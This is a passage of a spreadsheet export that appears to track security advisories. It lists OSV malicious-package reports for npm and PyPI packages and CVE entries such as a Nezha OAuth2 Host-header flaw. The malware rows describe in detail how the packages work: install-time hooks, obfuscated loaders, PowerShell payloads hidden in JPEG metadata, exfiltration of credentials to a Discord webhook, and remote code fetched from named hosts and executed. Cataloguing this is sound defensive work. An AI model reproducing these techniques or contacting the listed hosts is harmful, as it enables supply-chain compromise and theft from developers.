Package presents itself as an LLM SDK (nebula.js exposes a small client stub) but declares `preinstall: node preinstall.cjs` in package.json, and preinstall.cjs is a ~232KB single-line obfuscated blob that runs automatically on `npm install`. The script wraps its body in a `Function(...)` constructor and uses a custom PRNG-based string decoder (TEA/xorshift-style constants 0x9e3779b9 / 0x243f6a88 / 0x6a09e667) over a packed printable-ASCII string plus a hex-int array to reconstruct characters via `String.fromCharCode`, driving a control-flow-flattened switch dispatcher. Node builtins and method names are resolved dynamically at runtime (e.g. `Ooa8zU["Bd5Wj1"]("fs")`) so module ids, filesystem paths, network destinations, and command strings are not visible without executing the decoder. This obfuscation-plus-lifecycle-hook composition is the canonical install-time dropper / RCE shape: the benign-looking library entry serves as a cover story while the hidden preinstall payload runs on any consumer's machine at install time with the user's privileges, capable of arbitrary filesystem, process, and network operations.
</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17230</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17231</t>
        </is>
      </c>
      <c r="D80" s="5" t="inlineStr"/>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="inlineStr"/>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-native</t>
        </is>
      </c>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4369c7fa886fc7d315922759932056664863d71157bcdece943fa53339586f03)
Package `dotenv-native` typosquats the popular `dotenv` family (bundled internal manifest name `node-env-buffer`) and executes an attacker-controlled payload on module load. On require, `dist/index.cjs` and the `dot2env` CLI entry `dist/cli.cjs` invoke a `dispatchAnalytics` routine that opens the bundled `dist/stest.jpg`, scans JPEG segments for an APP1/EXIF (0xFFED) marker, extracts the marker contents as a UTF-8 string, writes a `relay_*.vbs` file to a temp directory, and spawns `wscript.exe` detached with `windowsHide:true` to launch `powershell.exe -EncodedCommand &lt;EXIF-derived base64&gt;`. The strings `powershell`, `shell`, `.exe`, `wscript.exe`, and `-EncodedCommand` are split into arrays and joined at runtime to evade static matching. A second artifact `dist/decode.js` is an obfuscator.io-style bundle that base64-decodes an inline blob, RC4-decrypts it with a hardcoded key, base64-decodes again, and passes the result to `new Function(require, module, __filename, __dirname,...)` — a decode-and-eval RCE primitive shipped alongside the main dropper. Both the library entry and the CLI entry carry the loader, so consumption as a dependency or invocation of the `dot2env` bin runs the payload on Windows hosts.
</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17231</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17232</t>
        </is>
      </c>
      <c r="D81" s="5" t="inlineStr"/>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="inlineStr"/>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-native-loader</t>
        </is>
      </c>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr"/>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d289ae71736f05158f45d6636730641e82b5a774bf99bf1b587155d31c73daaa)
package.json declares a postinstall hook that runs index.js on npm install. index.js reads Minecraft launcher credential stores (launcher_accounts.json, launcher_profiles.json, and equivalent files for Prism, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher), extracting Mojang/Microsoft accessTokens, refreshTokens, and clientTokens. It also recursively walks the.minecraft directory reading.json/.txt/.cfg/.properties/.yml/.log files and matches their contents against JWT and Bearer-token regexes. The collected credentials are combined with os.hostname(), os.userInfo().username, and os.platform() and POSTed via HTTPS to a hardcoded Discord webhook (discord.com/api/webhooks/1554065488726990909/...). No functionality matching the package name is present; the sole effect of installing the package is credential theft against the installer.
</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17232</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17233</t>
        </is>
      </c>
      <c r="D82" s="5" t="inlineStr"/>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="inlineStr"/>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-lock</t>
        </is>
      </c>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr"/>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (035a099bd6a60e41f1e1cbc1b70f27fecb9bef3f12d54e016d6991b581fc880f)
The npm package hardhat-lock@2.21.0 publishes itself as a logger/middleware but its identity and contents are inconsistent with that purpose: README badges, LICENSE, index.d.ts and docs/* are copied from the unrelated pino project (maintained by pinojs), while the package name squats the Ethereum-tooling keyword 'hardhat'. index.js unconditionally executes require('./lib/config') at module load, and lib/config.js is a ~4MB obfuscator.io-style single-line file (rotated string array of 23,981 entries, hex-escaped tokens, numeric wrapper decoders mt/mw/M0..M5/K/R/s/G, control-flow flattening, and 40,131 inline decoder replacements confirmed by webcrack) whose top-level IIFE runs the moment any downstream code does require('hardhat-lock'). The combination — impersonation of an established package under a different scope-adjacent name, opaque multi-megabyte obfuscated blob with no plausible logging use, and guaranteed import-time execution — is a supply-chain payload carrier: installing and loading the package places attacker-controlled code inside the consumer's Node.js process with unrestricted access to environment variables, filesystem, and network.
</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17233</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17234</t>
        </is>
      </c>
      <c r="D83" s="5" t="inlineStr"/>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="inlineStr"/>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-zet</t>
        </is>
      </c>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr"/>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (37cd33c0908189c0085fba153be1c42776411968aa5ad652dd7ffdef88b318bc)
hardhat-zet@2.0.1 is published under a name that impersonates the Hardhat Ethereum tooling ecosystem, but its README, type definitions and docs/ tree are copied verbatim from the unrelated `pino` logger project (badges and links point at npmjs.com/package/pino and github.com/pinojs/pino). The exported `middleware` in index.js is a no-op Express middleware and matches neither the `hardhat-zet` name nor the pino README. The package's declared main (index.js) top-level-requires./lib/config, which is not a configuration file but a 4,498,609-byte obfuscator.io-style bundle: a 26,113-entry rotated string array behind two runtime decoders (functions v and F), hex-encoded identifiers, and control-flow flattening. All strings and destination URLs are hidden behind the decoders, so this code runs automatically on any `require('hardhat-zet')` and its behavior is not observable without deobfuscation. Publisher metadata (author 'Robert King &lt;hello@jsonspack.com&gt;', bugs URL https://jsonspack.com/issues) ties to neither the Hardhat nor the pino identity. The combination — ecosystem-typosquat name targeting crypto/Hardhat developers, cover-story README lifted from an unrelated popular package, no-op public API, and a multi-megabyte obfuscated payload auto-executed on import — is the shape of a supply-chain stealer aimed at Ethereum developers.
</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17234</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17235</t>
        </is>
      </c>
      <c r="D84" s="5" t="inlineStr"/>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="inlineStr"/>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>npm:items-validator</t>
        </is>
      </c>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr"/>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8e49b1abd7c566b17104c5a2823251df2ca253a0fa509d7c19db1c1942ad13d)
On require, index.js invokes initializeDaemon() at top level, which uses spawn('node', [lib/check-items.js], { detached: true, stdio: 'ignore' }) followed by child.unref() to launch a persistent background process independent of the parent. The daemon HTTP-GETs a JSON payload from the hardcoded endpoint https://game.spawnrealm.com/api/item-realtime?key=abcdef123456 and passes payload.code to `new Function('require', 'module', payload.code)`, executing server-supplied JavaScript inside the installer's Node process with full `require` access. An RSA signature check is performed against a public key bundled in the package (crypto-config.js), so the author controls both the signing key and the verifier and the check provides no independent integrity guarantee. Anyone controlling game.spawnrealm.com — including via DNS or TLS — can run arbitrary code as the installing user for the lifetime of the host process. The package is advertised as a validator library, and this remote-code-loader behavior is undisclosed and unrelated to the stated purpose.
</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17235</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17236</t>
        </is>
      </c>
      <c r="D85" s="5" t="inlineStr"/>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="inlineStr"/>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>npm:mini-hardhat</t>
        </is>
      </c>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr"/>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbdfc97da008f90f11ae03963e75237c8bb746cf93f9cdc5da43ba5807ed6c1e)
mini-hardhat@1.1.4 presents itself as a pino-like JSON logger, but its main entry exports a middleware factory that, on instantiation, spawns lib/caller.js as a detached, stdio-ignored, unref'd child process so execution survives the parent. lib/caller.js base64-decodes a hardcoded URL (stored under decoy keys named DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) resolving to https://ipinfo-encrypted-v1.vercel.app/api/auth/f1f097d93c318c92f0c5, POSTs to it via axios, and passes the response body directly to new Function.constructor("require", s)(require), granting the remote endpoint arbitrary code execution inside the consumer's Node.js process with full require access. The fetch is retried up to 5 times. The declared purpose (logger/vulnerability-management document) does not match the shipped code, the destination URL and headers are base64-obfuscated, and the delivery is engineered to persist beyond the parent process — the shape of an intentional remote-code-execution dropper.
</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17236</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17237</t>
        </is>
      </c>
      <c r="D86" s="5" t="inlineStr"/>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="inlineStr"/>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>npm:native-env</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr"/>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8e9c612513357181c7e4d504f94a2a8c03de64724e2593217216de8fef4e7166)
native-env@1.0.1 presents itself as a zero-dependency dotenv toolkit but executes attacker-chosen code on Windows the moment the module is required or the bin is run. Both dist/index.cjs and dist/cli.cjs invoke dispatchAnalytics() at module top level. dispatchAnalytics() reads dist/stest.jpg, walks JPEG marker segments, extracts the contents of the APP13 (0xFFED) marker as a hidden string, writes a randomly-named relay_&lt;ts&gt;.vbs into the OS temp directory, and spawns wscript.exe detached (windowsHide:true) to launch powershell.exe -NoProfile -NonInteractive -EncodedCommand with the JPEG-hidden payload; the VBS self-deletes. The bundled dist/stest.jpg (287 KB) is not referenced anywhere else and serves solely as a payload carrier, a deliberate evasion of static scanners that inspect only.js files. dist/decode.js is a separate heavily-obfuscated loader using an obfuscator.io-style string-array dispatcher and RC4 decryption of an embedded base64 blob whose output is executed via new Function('require','module','__filename','__dirname', &lt;decoded&gt;)(...). The published name native-env conflicts with the bundled inner package.json which identifies the artifact as node-env-buffer 2.2.6 and exposes a dot2env CLI referencing DOT2ENV_*/DOTENV_* environment variables, consistent with typosquatting of dotenv-family packages.
</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17237</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17238</t>
        </is>
      </c>
      <c r="D87" s="5" t="inlineStr"/>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="inlineStr"/>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>npm:rai6jaisahthaghee5ou-loader-package</t>
        </is>
      </c>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr"/>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6de53fbd264f685e033789fe5929c63f322366219d80707ec419a48a85e253c9)
The package's main module is an IIFE that injects a &lt;script&gt; element pointing at the hardcoded URL https://nee1ahnaw7.xsses.link and appends it to the document, causing whatever JavaScript that host serves to execute in the caller's page context. The destination is unpinned, opaque, unrelated to the package's declared identity or publisher, and the host name aligns with XSS/payload delivery infrastructure. Any application that bundles this dependency will fetch and execute attacker-controlled JavaScript at runtime, granting full code execution within the app's origin — enabling credential/session theft, arbitrary DOM manipulation, and further payload staging.
</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17238</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17239</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>npm:test-agency-assignment</t>
        </is>
      </c>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr"/>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dcdf62e1c1eb44ca7a29ed37c12bdb71883025a46c5066e58c9228f0dfe782c2)
package.json declares a postinstall lifecycle script `wscript.exe 4444.vbs`, causing the VBS file shipped in the tarball to run automatically on `npm install` on Windows hosts. 4444.vbs contains a hand-rolled multi-layer decoder (Base64, an XOR-masked AES S-box, ChaCha20-IETF, additional XOR) that concatenates hundreds of embedded ~2KiB Base64 chunks stored in `ArtifactBundleHX(...)`, decrypts them, writes the resulting PowerShell loader to a randomly named file under %TEMP% (`pf&lt;rand&gt;.dat`), and invokes powershell.exe against it. In-file comments describe the handoff to PowerShell as being for process hollowing. The file header presents a benign 'Device Telemetry Aggregator' cover story that does not match the shipped behavior. The package's only functional content is this dropper; installing the package on Windows results in arbitrary attacker-controlled code execution on the installer's host.
</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17239</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17240</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>PyPI:aseitylab</t>
        </is>
      </c>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr"/>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9b47f0f7a0776cad3d4c83604d35a0023a250d2f035e58129233095aa2b110a3)
aseitylab/_shimdata.py contains a large base85-encoded, zlib-compressed blob stored as DATA. aseitylab/compat.py defines _ensure_compat(), which base85-decodes and zlib-inflates DATA and passes the result to exec(compile(..., '&lt;aseitylab-compat&gt;', 'exec')). setup.py imports aseitylab.compat and invokes _ensure_compat() during package build/install, and aseitylab/__init__.py calls the same function on every import, so the decoded payload runs both when the package is installed and whenever it is imported. Execution is gated by environment variables (ASEITYLAB_COMPAT=0, DAS_STAGED=1) that allow the payload to be suppressed in build or test environments. The README advertises a pure-Python task-orchestration toolkit with no runtime dependencies, which does not require a compressed, encoded executable blob shipped as 'compatibility shim data'. MANIFEST.in additionally excludes file names (loader_payload.py, make_armed.py, armed.json, manifest.benign.json) consistent with a build harness that produces separate 'armed' and 'benign' tarballs. The contents of the executed payload are not inspectable from the shipped source; installing or importing the package hands arbitrary code execution to whatever DATA decodes to.
## Source: kam193 (24b99c2059065cbe44f7dac2f1d2878b237c58150c0890baa1856852e76fcb24)
During installation, obfuscated code is used to fetch code hidden in an image containing a Python application with a native extension module. This module holds an obfuscated infostealer which collects sensitive data and exfiltrates them to a C2 server retrieved from transaction history in the Polygon blockchain.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-donutautosellsrc
Reasons (based on the campaign):
 - infostealer
 - Downloads and executes a remote executable.
 - obfuscation
 - The package contains code to detect if it is running in a sandbox environment.
 - malware
 - native-extension
 - steganography
 - c2-in-blockchain
</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17240</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101090</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/nezhahq/nezha</t>
        </is>
      </c>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Nezha 2.2.3 contains a Host header injection regression in the OAuth2 redirect endpoint. When the new optional dashboard_host setting is empty, /api/v1/oauth2/{provider} (cmd/dashboard/controller/oauth2.go) reflects the attacker-supplied HTTP Host header into the redirect_uri sent to the identity provider instead of falling back to the configured install_host. An attacker who induces a victim to begin OAuth2 login via a request that reaches Nezha with a forged Host header can cause an attacker-controlled callback URL to be used as the redirect_uri; if the OAuth2 provider accepts it, the victim's authorization code is delivered to the attacker origin, allowing the attacker to complete the OAuth2 login/binding flow and take over the account. This regresses the fix for GHSA-9rc6-8cjv-rcvx and is configuration-dependent (dashboard_host empty). At the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101090</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.6 → 8.3)</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101064</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M91" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N91" s="5" t="inlineStr">
        <is>
